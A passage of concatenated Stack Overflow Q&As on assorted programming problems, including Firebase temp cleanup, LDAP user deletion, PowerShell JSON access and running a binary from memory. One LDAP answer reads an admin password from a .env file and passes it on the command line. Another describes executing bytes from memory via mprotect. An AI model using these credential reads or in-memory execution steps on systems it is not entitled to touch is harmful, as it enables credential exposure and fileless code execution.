tk.Button(master = root, text = "Back", command = back).pack(side = tk.LEFT)
tk.Button(master = root, text = "Left", command = left).pack(side = tk.LEFT)
tk.Button(master = root, text = "Right", command = right).pack(side = tk.LEFT)
root.mainloop()
I have never used this module before but what I have written seems to do what you want.
References:
*
*http://www.eg.bucknell.edu/~hyde/Python3/TurtleDirections.html
*https://www.reddit.com/r/learnpython/comments/4qdcmw/can_you_add_turtle_graphics_to_a_tkinter_window/
| Q: Integrate turtle module with tkinter canvas I am trying to integrate the Turtle module into an interface I have created with TKInter, currently I have a canvas where I would like for the turtle to draw to (see example 1). However I am lost in how to get the draw to it.
A: Try this:
import turtle
import tkinter as tk
def forward():
t.forward(100)
def back():
t.back(100)
def left():
t.left(90)
def right():
t.right(90)
root = tk.Tk()
canvas = tk.Canvas(master = root, width = 500, height = 500)
canvas.pack()
t = turtle.RawTurtle(canvas)
t.pencolor("#ff0000") # Red
t.penup() # Regarding one of the comments
t.pendown() # Regarding one of the comments
tk.Button(master = root, text = "Forward", command = forward).pack(side = tk.LEFT)
tk.Button(master = root, text = "Back", command = back).pack(side = tk.LEFT)
tk.Button(master = root, text = "Left", command = left).pack(side = tk.LEFT)
tk.Button(master = root, text = "Right", command = right).pack(side = tk.LEFT)
root.mainloop()
I have never used this module before but what I have written seems to do what you want.
References:
*
*http://www.eg.bucknell.edu/~hyde/Python3/TurtleDirections.html
*https://www.reddit.com/r/learnpython/comments/4qdcmw/can_you_add_turtle_graphics_to_a_tkinter_window/
| stackoverflow | {
"language": "en",
"length": 176,
"provenance": "stackexchange_0000F.jsonl.gz:900502",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653500"
} |
40fac06313a2844e587b756f7e5ab924b22b8df7 | Stackoverflow Stackexchange
Q: Cleanup Temp Directory Firebase cloud Functions I am using Cloud Functions for Firebase for my webapp. I need to create thumbnail for any image uploaded on Firebase Storage. For that I need to download the uploaded file from GCS bucket to temp directory(using mkdirp-promise), and apply imageMagick command to create a thumbnail. (Firebase Function Samples- Generate Thumbnail)
return mkdirp(tempLocalDir).then(() => {
console.log('Temporary directory has been created', tempLocalDir);
// Download file from bucket.
return bucket.file(filePath).download({
destination: tempLocalFile
});
}).then(() => {
//rest of the program
});
});
My Question is:
*
*where is this temp directory created?
*Is this temp storage counted against my firebase cloud storage or Google cloud Storage quota?
*How can I cleanup my temp directory, after i have successfully uploaded newly created thumbnail file? So that my quota doesnt exceed.
A: *
*The temp directory is created in tmpfs, which in the Cloud Functions environment is kept in memory. See https://cloud.google.com/functions/pricing#local_disk
*Since tmpfs is kept in memory, it counts against the memory usage of your Functions.
*You remove a directory by calling fs.rmdir(): https://nodejs.org/api/fs.html#fs_fs_rmdir_path_callback
| Q: Cleanup Temp Directory Firebase cloud Functions I am using Cloud Functions for Firebase for my webapp. I need to create thumbnail for any image uploaded on Firebase Storage. For that I need to download the uploaded file from GCS bucket to temp directory(using mkdirp-promise), and apply imageMagick command to create a thumbnail. (Firebase Function Samples- Generate Thumbnail)
return mkdirp(tempLocalDir).then(() => {
console.log('Temporary directory has been created', tempLocalDir);
// Download file from bucket.
return bucket.file(filePath).download({
destination: tempLocalFile
});
}).then(() => {
//rest of the program
});
});
My Question is:
*
*where is this temp directory created?
*Is this temp storage counted against my firebase cloud storage or Google cloud Storage quota?
*How can I cleanup my temp directory, after i have successfully uploaded newly created thumbnail file? So that my quota doesnt exceed.
A: *
*The temp directory is created in tmpfs, which in the Cloud Functions environment is kept in memory. See https://cloud.google.com/functions/pricing#local_disk
*Since tmpfs is kept in memory, it counts against the memory usage of your Functions.
*You remove a directory by calling fs.rmdir(): https://nodejs.org/api/fs.html#fs_fs_rmdir_path_callback
A: Here's some of the code I wrote for the "Fire!sale" continuous deployment demo at Google I/O (warning: it's in TypeScript, not JavaScript. This lets me use await/async which is easier to read, especially in the case of error handling)
import * as fs from 'fs';
import * as os from 'os';
import * as path from 'path';
let tempy = require('tempy'); // No .d.ts
function rmFileAsync(file: string) {
return new Promise((resolve, reject) => {
fs.unlink(file, (err) => {
if (err) {
reject(err);
} else {
resolve();
}
})
})
}
function statAsync(file: string): Promise<fs.Stats> {
return new Promise((resolve, reject) => {
fs.stat(file, (err, stat) => {
if (err) {
reject(err);
} else {
resolve(stat);
}
})
})
}
async function rmrfAsync(dir: string) {
// Note: I should have written this to be async too
let files = fs.readdirSync(dir);
return Promise.all(_.map(files, async (file) => {
file = path.join(dir, file);
let stat = await statAsync(file);
if (stat.isFile()) {
return rmFileAsync(file);
}
return rmrfAsync(file);
}));
}
Then inside my Cloud Functions code I could do something like the following:
export let myFunction = functions.myTrigger.onEvent(async event => {
// If I want to be extra aggressive to handle any timeouts/failures and
// clean up before execution:
try {
await rmrfAsync(os.tmpdir());
} catch (err) {
console.log('Failed to clean temp directory. Deploy may fail.', err);
}
// In an async function we can use try/finally to ensure code runs
// without changing the error status of the function.
try {
// Gets a new directory under /tmp so we're guaranteed to have a
// clean slate.
let dir = tempy.directory();
// ... do stuff ...
} finally {
await rmrfAsync(dir);
}
}
| stackoverflow | {
"language": "en",
"length": 455,
"provenance": "stackexchange_0000F.jsonl.gz:900513",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653533"
} |
655e878f5e5cfe7347ea6d883daca78f2eb9a2ec | Stackoverflow Stackexchange
Q: How to delete a user from the LDAP container I need to delete a user from the LDAP container.
First of all I searched for the user using :
$ ldapsearch -x -b "dc=tuleap,dc=local" -s sub "objectclass=*"
I found the user and than I execute :
$ ldapdelete -v -D "uid=user,dc=tuleap,dc=local" -w userpassword
I get this :
ldap_initialize( DEFAULT )
ldap_bind: Invalid credentials (49)
Any one can help to resolve this issue.
A: From what you put in your comments, the error Invalid credentials (49) comes from the incorrect DN you provided for your user :
uid=user,dc=tuleap,dc=local instead of uid=user,ou=people,dc=tuleap,dc=local
Now for the syntax of your command, you have to specify which entry you want to delete from the directory.
From the documentation :
If one or more DN arguments are provided, entries with those
Distinguished Names are deleted. Each DN should be provided using the
LDAPv3 string representation as defined in RFC 4514
For example :
ldapdelete -v -D "uid=user,ou=people,dc=tuleap,dc=local" -W "uid=user2,ou=people,dc=tuleap,dc=local"
Which will try to delete the entry : uid=user2,ou=people,dc=tuleap,dc=local
| Q: How to delete a user from the LDAP container I need to delete a user from the LDAP container.
First of all I searched for the user using :
$ ldapsearch -x -b "dc=tuleap,dc=local" -s sub "objectclass=*"
I found the user and than I execute :
$ ldapdelete -v -D "uid=user,dc=tuleap,dc=local" -w userpassword
I get this :
ldap_initialize( DEFAULT )
ldap_bind: Invalid credentials (49)
Any one can help to resolve this issue.
A: From what you put in your comments, the error Invalid credentials (49) comes from the incorrect DN you provided for your user :
uid=user,dc=tuleap,dc=local instead of uid=user,ou=people,dc=tuleap,dc=local
Now for the syntax of your command, you have to specify which entry you want to delete from the directory.
From the documentation :
If one or more DN arguments are provided, entries with those
Distinguished Names are deleted. Each DN should be provided using the
LDAPv3 string representation as defined in RFC 4514
For example :
ldapdelete -v -D "uid=user,ou=people,dc=tuleap,dc=local" -W "uid=user2,ou=people,dc=tuleap,dc=local"
Which will try to delete the entry : uid=user2,ou=people,dc=tuleap,dc=local
A: After a long period of researching, I found a solution for that.
First I searched for the user using ldapsearch
ldapsearch -x -b "uid=user,ou=people,dc=tuleap,dc=local" -s sub "objectclass=*"
After that I deleted the user using ldapdelete
ldapdelete -v -c -D "cn=Manager,dc=tuleap,dc=local" -w ladap-manager-password "uid=user,ou=people,dc=tuleap,dc=local"
Executing tuleap]# cat .env I found the ladap-manager-password
| stackoverflow | {
"language": "en",
"length": 225,
"provenance": "stackexchange_0000F.jsonl.gz:900519",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653559"
} |
7a15f04a44f2969c41476be514ee735a251e1bb5 | Stackoverflow Stackexchange
Q: Adding a traditional legend to dumbbell plot in `ggalt::geom_dumbbell` in `R` How to add a traditional legend to dumbbell plot created using ggalt::geom_dumbbell in R?
This question has an answer with an in-chart legend. How to map the aesthetics to get a separate legend for the points on the side/bottom ?
library(ggalt)
df <- data.frame(trt=LETTERS[1:5], l=c(20, 40, 10, 30, 50), r=c(70, 50, 30, 60, 80))
ggplot(df, aes(y=trt, x=l, xend=r)) +
geom_dumbbell(size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw()
A: One way to get a legend is to add a points layer based on the dataset in long format, mapping color to the grouping variable.
First, make a long format dataset via gather from tidyr.
df2 = tidyr::gather(df, group, value, -trt)
Then make the plot, adding the new points layer with the long dataset and using scale_color_manual to set colors. I moved the geom_dumbbell specific aesthetics into that layer.
ggplot(df, aes(y = trt)) +
geom_point(data = df2, aes(x = value, color = group), size = 3) +
geom_dumbbell(aes(x = l, xend = r), size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw() +
scale_color_manual(name = "", values = c("red", "blue") )
| Q: Adding a traditional legend to dumbbell plot in `ggalt::geom_dumbbell` in `R` How to add a traditional legend to dumbbell plot created using ggalt::geom_dumbbell in R?
This question has an answer with an in-chart legend. How to map the aesthetics to get a separate legend for the points on the side/bottom ?
library(ggalt)
df <- data.frame(trt=LETTERS[1:5], l=c(20, 40, 10, 30, 50), r=c(70, 50, 30, 60, 80))
ggplot(df, aes(y=trt, x=l, xend=r)) +
geom_dumbbell(size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw()
A: One way to get a legend is to add a points layer based on the dataset in long format, mapping color to the grouping variable.
First, make a long format dataset via gather from tidyr.
df2 = tidyr::gather(df, group, value, -trt)
Then make the plot, adding the new points layer with the long dataset and using scale_color_manual to set colors. I moved the geom_dumbbell specific aesthetics into that layer.
ggplot(df, aes(y = trt)) +
geom_point(data = df2, aes(x = value, color = group), size = 3) +
geom_dumbbell(aes(x = l, xend = r), size=3, color="#e3e2e1",
colour_x = "red", colour_xend = "blue",
dot_guide=TRUE, dot_guide_size=0.25) +
theme_bw() +
scale_color_manual(name = "", values = c("red", "blue") )
| stackoverflow | {
"language": "en",
"length": 198,
"provenance": "stackexchange_0000F.jsonl.gz:900532",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653597"
} |
7a2b111c29607540246c12b4deb8e79bd292df72 | Stackoverflow Stackexchange
Q: Typescript: Declare functions without implementing them Is it possible to declare that a class has certain functions without implementing them?
I need this because I create a class that is then passed to a js framework which adds a couple of functions. I wanna be able to call those functions aswell without reimplementing them, redirecting or casting or whatsoever.
Example:
//example class
class AppComponent {
constructor() {}
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
A: You may declare the function without implementing it.
//example class
class AppComponent {
constructor() { }
setModel: () => void;
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
| Q: Typescript: Declare functions without implementing them Is it possible to declare that a class has certain functions without implementing them?
I need this because I create a class that is then passed to a js framework which adds a couple of functions. I wanna be able to call those functions aswell without reimplementing them, redirecting or casting or whatsoever.
Example:
//example class
class AppComponent {
constructor() {}
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
A: You may declare the function without implementing it.
//example class
class AppComponent {
constructor() { }
setModel: () => void;
}
//create class
var comp: AppComponent = new AppComponent();
//hand over to framework
fw.define("Component", comp);
//now I want to be able to call the added functions such as:
comp.setModel(/*some model*/);
| stackoverflow | {
"language": "en",
"length": 149,
"provenance": "stackexchange_0000F.jsonl.gz:900540",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653623"
} |
ef77e8b054dfab91e870402a368b334122b67bed | Stackoverflow Stackexchange
Q: The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' In an ASP.Net Core 1.1 web application, in VS 2017, I need to reference the package:
Microsoft.EntityFrameworkCore.Relational
(this is in order to call stored procedures with result sets as described here:
How to run stored procedures in Entity Framework Core?)
When installing the package from PM console, with:
Install-Package Microsoft.EntityFrameworkCore.Relational
I get "Successfully installed 'Microsoft.EntityFrameworkCore.Relational 1.1.2'"
But when I add the line:
using Microsoft.EntityFrameworkCore.Relational;
at the top of the file, the word "Relational" has a red squiggle under with the error:
The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' (are you missing an assembly reference?)
I isolated the problem to creating a new project of type "ASP.Net Core Web Application (.Net Framework)", selecting the template for an empty ASP.Net Core 1.1 project, then installing the above package. I still get the same error.
TIA
A: Microsoft.EntityFrameworkCore.Relational is assembly. There is no such namespace in EF Core.
The FromSql method is defined in the Microsoft.EntityFrameworkCore namespace, RelationalQueryableExtensions class, so all you need to get access to it is the typical
using Microsoft.EntityFrameworkCore;
| Q: The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' In an ASP.Net Core 1.1 web application, in VS 2017, I need to reference the package:
Microsoft.EntityFrameworkCore.Relational
(this is in order to call stored procedures with result sets as described here:
How to run stored procedures in Entity Framework Core?)
When installing the package from PM console, with:
Install-Package Microsoft.EntityFrameworkCore.Relational
I get "Successfully installed 'Microsoft.EntityFrameworkCore.Relational 1.1.2'"
But when I add the line:
using Microsoft.EntityFrameworkCore.Relational;
at the top of the file, the word "Relational" has a red squiggle under with the error:
The type or namespace name 'Relational' does not exist in the namespace 'Microsoft.EntityFrameworkCore' (are you missing an assembly reference?)
I isolated the problem to creating a new project of type "ASP.Net Core Web Application (.Net Framework)", selecting the template for an empty ASP.Net Core 1.1 project, then installing the above package. I still get the same error.
TIA
A: Microsoft.EntityFrameworkCore.Relational is assembly. There is no such namespace in EF Core.
The FromSql method is defined in the Microsoft.EntityFrameworkCore namespace, RelationalQueryableExtensions class, so all you need to get access to it is the typical
using Microsoft.EntityFrameworkCore;
| stackoverflow | {
"language": "en",
"length": 190,
"provenance": "stackexchange_0000F.jsonl.gz:900554",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653667"
} |
5aa1d4ed27f510ebc62f78d34f23486e594ea177 | Stackoverflow Stackexchange
Q: Typescript (Angular) : unit test a subscription I have a simple function that does this
ngOnInit() {
if (this.session.getToken()) {
this.isUserLogged = true;
}
this.loadingObserver = this.session.loadingObservable.subscribe(loading => this.isLoading = loading);
}
and my test is as follows
it('Testing ngOnInit() ...', async(() => {
let spy = spyOn(services.session, 'getToken').and.returnValue('token');
services.session.loadingObservable.subscribe(any => expect(component.isLoading).toEqual(false));
component.ngOnInit();
expect(component.isUserLogged).toEqual(true);
expect(spy).toHaveBeenCalled();
}));
But in the code coverage of my application, the subscribe isn't covered. In fact, expecting false also works.
Do you have any idea on how to test a subscription ?
A: Whether your handler code gets called or not on subscribe depends on the nature of the Observable you are subscribing to -- specifically its "hotness" or "coldness". Read this excellent explanation -- https://blog.thoughtram.io/angular/2016/06/16/cold-vs-hot-observables.html -- and see where your "loadingObservable" falls in the taxonomy. But I suspect as was suggested in the comments, you need to force it to fire in your unit test.
| Q: Typescript (Angular) : unit test a subscription I have a simple function that does this
ngOnInit() {
if (this.session.getToken()) {
this.isUserLogged = true;
}
this.loadingObserver = this.session.loadingObservable.subscribe(loading => this.isLoading = loading);
}
and my test is as follows
it('Testing ngOnInit() ...', async(() => {
let spy = spyOn(services.session, 'getToken').and.returnValue('token');
services.session.loadingObservable.subscribe(any => expect(component.isLoading).toEqual(false));
component.ngOnInit();
expect(component.isUserLogged).toEqual(true);
expect(spy).toHaveBeenCalled();
}));
But in the code coverage of my application, the subscribe isn't covered. In fact, expecting false also works.
Do you have any idea on how to test a subscription ?
A: Whether your handler code gets called or not on subscribe depends on the nature of the Observable you are subscribing to -- specifically its "hotness" or "coldness". Read this excellent explanation -- https://blog.thoughtram.io/angular/2016/06/16/cold-vs-hot-observables.html -- and see where your "loadingObservable" falls in the taxonomy. But I suspect as was suggested in the comments, you need to force it to fire in your unit test.
| stackoverflow | {
"language": "en",
"length": 151,
"provenance": "stackexchange_0000F.jsonl.gz:900563",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653684"
} |
acb546960dcab0dbf7b5f05ae2a2c994656ac319 | Stackoverflow Stackexchange
Q: Android: Too much allocated memory while using png instead of vector images I am using 10 png images of size 20-30kb in imageView, but the allocated memory increases from 70mb to 270mb when this activity loads.
So why this too much of memory is allocated to these images.
This is the screenshot of memory allocation
This is one of my image
A: File size doesn't matter. No, matter your image is of 20kb but its resolution is quite big. When image is loaded into memory it takes memory equal to totalNoOfDotsInImageBitmap * 4bytes
and totalNoOfDotsInImageBitmap = width *height of image.
4 bytes - because of ARBG ( 1 byte per argument) for single dot of bitmap
so reducing width and height of image may solve your problem.
| Q: Android: Too much allocated memory while using png instead of vector images I am using 10 png images of size 20-30kb in imageView, but the allocated memory increases from 70mb to 270mb when this activity loads.
So why this too much of memory is allocated to these images.
This is the screenshot of memory allocation
This is one of my image
A: File size doesn't matter. No, matter your image is of 20kb but its resolution is quite big. When image is loaded into memory it takes memory equal to totalNoOfDotsInImageBitmap * 4bytes
and totalNoOfDotsInImageBitmap = width *height of image.
4 bytes - because of ARBG ( 1 byte per argument) for single dot of bitmap
so reducing width and height of image may solve your problem.
A: Depending on where you are putting the assets it may be trying to load a file that is too large.
For instance, if you have it on drawable or nodpi-drawable a device with a low density will try to load a potentially large image.
Also, bear in mind that the actual file size is not that important as it is probably small due to compression, but the image has to be converted to bitmap when it gets drawn, so if the actual size is too much that can also cause an OOM.
If you have access to the original I would recommend using a vector drawable (it's a simple shape so should be ok) and AS will generate the required PNG files for older versions.
| stackoverflow | {
"language": "en",
"length": 254,
"provenance": "stackexchange_0000F.jsonl.gz:900568",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653697"
} |
0b696a33d3d7d88a22d56840a4641f29849e4b20 | Stackoverflow Stackexchange
Q: vue + mailchimp ajax signup cors error using axios in a vue.js project, I'm having issues call the mailchimp API to sign up an email for a newsletter.
axios.post('//myappname.us9.list-manage.com/subscribe/post-json', {
u: 'abcde',
id: '12345',
EMAIL: this.email
}).then(response => {
console.log(response)
}).catch(response => {
console.log(response)
})
Results an error in the OPTIONS preflight:
Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.
How can I bypass these CORS issues? I tried with JSONP, that semi-works. My request come through, but I can't handle the response very well, as I don't really get a response, but just an error, as the response isn't a JSONP response, but a ordinary JSON response.
I used the vue-jsonp package for the jsonp test.
Any pinpointers? Would be much appreciated. Thanks.
| Q: vue + mailchimp ajax signup cors error using axios in a vue.js project, I'm having issues call the mailchimp API to sign up an email for a newsletter.
axios.post('//myappname.us9.list-manage.com/subscribe/post-json', {
u: 'abcde',
id: '12345',
EMAIL: this.email
}).then(response => {
console.log(response)
}).catch(response => {
console.log(response)
})
Results an error in the OPTIONS preflight:
Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource.
How can I bypass these CORS issues? I tried with JSONP, that semi-works. My request come through, but I can't handle the response very well, as I don't really get a response, but just an error, as the response isn't a JSONP response, but a ordinary JSON response.
I used the vue-jsonp package for the jsonp test.
Any pinpointers? Would be much appreciated. Thanks.
| stackoverflow | {
"language": "en",
"length": 135,
"provenance": "stackexchange_0000F.jsonl.gz:900582",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653760"
} |
dca5cb64473a3da5c6543364ea8d4969b9f292ea | Stackoverflow Stackexchange
Q: PowerShell -- Accessing a JArray inside a JObject I have a Json object
{
"ProjectDirectory": "C:\\Main",
"SiteName": "RemoteOrder",
"ParentPath": "/Areas//Views",
"VirtualDirectories": [
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
},
{
"Name": "Analytics",
"Path": "\\Areas\\RemoteOrder\\Views\\Analytics"
},
{
"Name": "Auth",
"Path": "\\Areas\\RemoteOrder\\Views\\Auth"
}
]
}
that I created by
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
I can access things like
$config["ProjectDirectory"]
$config["VirtualDirectories"]
But I can not get to the element inside the VirtualDirectories JArray
I confirmed
$config["VirtualDirectories"][0].GetType() // JObject
$config["VirtualDirectories"].GetType() // JArray
$config // JObject
I have tried
$config["VirtualDirectories"][0]["Name"]
$config["VirtualDirectories"][0]["Path"]
$config["VirtualDirectories"][0][0]
$config["VirtualDirectories"][0].GetValue("Name")
When I try
$config["VirtualDirectories"][0].ToString()
I get
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
}
What I am really trying to do is access it a loop but again I can not seem to access the JObject Elements
A: You are close. $config["VirtualDirectories"][0]["Name"] will give you a JValue containing the text. You just need to use the Value property from there to get the actual string. Here is how you would do it in a ForEach loop:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
ForEach ($dir in $config["VirtualDirectories"])
{
$name = $dir["Name"].Value
$path = $dir["Path"].Value
...
}
| Q: PowerShell -- Accessing a JArray inside a JObject I have a Json object
{
"ProjectDirectory": "C:\\Main",
"SiteName": "RemoteOrder",
"ParentPath": "/Areas//Views",
"VirtualDirectories": [
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
},
{
"Name": "Analytics",
"Path": "\\Areas\\RemoteOrder\\Views\\Analytics"
},
{
"Name": "Auth",
"Path": "\\Areas\\RemoteOrder\\Views\\Auth"
}
]
}
that I created by
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
I can access things like
$config["ProjectDirectory"]
$config["VirtualDirectories"]
But I can not get to the element inside the VirtualDirectories JArray
I confirmed
$config["VirtualDirectories"][0].GetType() // JObject
$config["VirtualDirectories"].GetType() // JArray
$config // JObject
I have tried
$config["VirtualDirectories"][0]["Name"]
$config["VirtualDirectories"][0]["Path"]
$config["VirtualDirectories"][0][0]
$config["VirtualDirectories"][0].GetValue("Name")
When I try
$config["VirtualDirectories"][0].ToString()
I get
{
"Name": "Alerts",
"Path": "\\Areas\\RemoteOrder\\Views\\Alerts"
}
What I am really trying to do is access it a loop but again I can not seem to access the JObject Elements
A: You are close. $config["VirtualDirectories"][0]["Name"] will give you a JValue containing the text. You just need to use the Value property from there to get the actual string. Here is how you would do it in a ForEach loop:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
ForEach ($dir in $config["VirtualDirectories"])
{
$name = $dir["Name"].Value
$path = $dir["Path"].Value
...
}
A: To complement Brian Rogers' helpful answer:
As a more convenient alternative to index syntax (["<name>"]) you can use property syntax
(.<name>), because the JObject instances returned have dynamic properties named for their keys:
$config = [Newtonsoft.Json.Linq.JObject]::Parse($file)
foreach ($dir in $config.VirtualDirectories) {
$name = $dir.Name.Value # as in Brian's answer: note the need for .Value
$path = $dir.Path.Value # ditto
# Sample output
"$name=$path" # outputs 'Alerts=\Areas\RemoteOrder\Views\Alerts', ...
}
I presume that the reason you chose to work with Json.NET types directly is performance compared to PowerShell's built-in ConvertFrom-Json cmdlet.
*
*As an aside: There is a PowerShell wrapper for Json.NET that you can install with Install-Module -Scope CurrentUser newtonsoft.json , for instance, which implicitly gives you access to the [Newtonsoft.Json.Linq.JObject] type. However, this wrapper - which represents objects as ordered hashtables - is even slower than ConvertFrom-Json.
*Aside from performance, the following limitations of ConvertFrom-Json may make it necessary to use a third-party library such as Json.Net anyway:
*
*Empty-string keys are not supported.
*Keys that differ in case only (e.g., foo vs. Foo) are not supported.
For contrast, here's the equivalent - but generally slower - ConvertFrom-Json solution:
ConvertFrom-Json represents the JSON objects as [pscustomobject] instances whose properties are named for the keys, allowing for a more natural syntax without the need to access .Value:
$config = ConvertFrom-Json $json
foreach ($dir in $config.VirtualDirectories) {
$name = $dir.Name # no .Value needed
$path = $dir.Path # ditto
# Sample output
"$name=$path" # outputs 'Alerts=\Areas\RemoteOrder\Views\Alerts', ...
}
| stackoverflow | {
"language": "en",
"length": 424,
"provenance": "stackexchange_0000F.jsonl.gz:900584",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653771"
} |
7210bcdb50eb709649cf1c70746e0f639260c072 | Stackoverflow Stackexchange
Q: Laravel: AJAX request endpoints in routes/api.php or routes/web.php? I have a Laravel app where I fetch and update data asynchronously from my frontend. My question is: Do the endpoints for the AJAX requests go into the routes/api.php or in the routes/web.php?
A: The routes/web.php file defines routes that are for your web interface. These routes are assigned the web middleware group, which provides features like session state and CSRF protection. So generally your all routes having web middleware goes to routes/web.php.
If your route having api middleware then it will goes to routes/api.php.
| Q: Laravel: AJAX request endpoints in routes/api.php or routes/web.php? I have a Laravel app where I fetch and update data asynchronously from my frontend. My question is: Do the endpoints for the AJAX requests go into the routes/api.php or in the routes/web.php?
A: The routes/web.php file defines routes that are for your web interface. These routes are assigned the web middleware group, which provides features like session state and CSRF protection. So generally your all routes having web middleware goes to routes/web.php.
If your route having api middleware then it will goes to routes/api.php.
A: Normally in web.php as the routes will use the 'web' middleware to access the session and other web-related middleware (CSRF ecc..)
api.php is dedicated to 'stateless' API calls, where you don't want to use session but instead use stateless specific functions such as api authentication throttle and so on
| stackoverflow | {
"language": "en",
"length": 144,
"provenance": "stackexchange_0000F.jsonl.gz:900636",
"question_score": "13",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653927"
} |
c16884f2035bb6cfdf336a4183afbb83a3eb002a | Stackoverflow Stackexchange
Q: How to set FlushMode to COMMIT in SPRING DATA for a single method I would like to make a single method to run without the FlushMode.ALWAYS.
So I need to setFlushMode(FlushMode.COMMIT) but I don't know how to do that and I'm starting to think that it's not possible using spring data.
I tried to autowire SessionFactory and do this
sessionFactory.getCurrentSession().setFlushMode(FlushMode.COMMIT);
But I got this error
No qualifying bean of type [org.hibernate.SessionFactory] found for dependency...
What I understand is that I can't autowire session factory, so I can't use that way of setting flush mode.
Then my question is
Is there a way to set flush mode for a single method using spring data? How?
A: I ended annotating my find method in my JPARepository interface like this:
@QueryHints(value = { @QueryHint(name = org.hibernate.annotations.QueryHints.FLUSH_MODE, value = "COMMIT") })
List<ConcatenaCep> findByCep(Integer cep);
| Q: How to set FlushMode to COMMIT in SPRING DATA for a single method I would like to make a single method to run without the FlushMode.ALWAYS.
So I need to setFlushMode(FlushMode.COMMIT) but I don't know how to do that and I'm starting to think that it's not possible using spring data.
I tried to autowire SessionFactory and do this
sessionFactory.getCurrentSession().setFlushMode(FlushMode.COMMIT);
But I got this error
No qualifying bean of type [org.hibernate.SessionFactory] found for dependency...
What I understand is that I can't autowire session factory, so I can't use that way of setting flush mode.
Then my question is
Is there a way to set flush mode for a single method using spring data? How?
A: I ended annotating my find method in my JPARepository interface like this:
@QueryHints(value = { @QueryHint(name = org.hibernate.annotations.QueryHints.FLUSH_MODE, value = "COMMIT") })
List<ConcatenaCep> findByCep(Integer cep);
| stackoverflow | {
"language": "en",
"length": 141,
"provenance": "stackexchange_0000F.jsonl.gz:900638",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653930"
} |
53909ef15674cd10718babcf0ca628f5e5877f99 | Stackoverflow Stackexchange
Q: How can i execute an executable from memory? Let's say I have included a binary into my program during compilation so, I keep it in a variable something like
var myExec =[]byte{'s','o','m','e',' ','b','y','t','e','s'}
So my question is whether there is a way to execute this binary within my program without writing it back to the disc and calling exec or fork on it?
I am writing my app in Golang so the method I am seeking for is to do it using Go or C (using CGO).
Basically, I am seeking something like piping the bash script into bash just I don't know where can I pipe the bytes of a native executable to run it and writing it back to disk and then letting os to read it again seems a lot of extra work to be done
A: In C and assuming Linux, you can change the protection of a memory region by means of the mprotect() system call, so that it can be executed (i.e.: turn a data region into a code region). After that, you could execute that region of memory by jumping into it.
| Q: How can i execute an executable from memory? Let's say I have included a binary into my program during compilation so, I keep it in a variable something like
var myExec =[]byte{'s','o','m','e',' ','b','y','t','e','s'}
So my question is whether there is a way to execute this binary within my program without writing it back to the disc and calling exec or fork on it?
I am writing my app in Golang so the method I am seeking for is to do it using Go or C (using CGO).
Basically, I am seeking something like piping the bash script into bash just I don't know where can I pipe the bytes of a native executable to run it and writing it back to disk and then letting os to read it again seems a lot of extra work to be done
A: In C and assuming Linux, you can change the protection of a memory region by means of the mprotect() system call, so that it can be executed (i.e.: turn a data region into a code region). After that, you could execute that region of memory by jumping into it.
| stackoverflow | {
"language": "en",
"length": 190,
"provenance": "stackexchange_0000F.jsonl.gz:900648",
"question_score": "9",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653960"
} |
f1a8bec93ff4e79084e2b93854b4a222136ad51e | Stackoverflow Stackexchange
Q: Glassfish There is a process already using the admin port 4848 asadmin start-domain domain1
But it shows this error.
There is a process already using the admin port 4848 -- it probably is another instance of a GlassFish server.
I have searched and found that it could be the hostname or that the port is used by an other application or server and actually it is used by TCP.
I have no problem with the hostname so I've tried this solution by changing port.
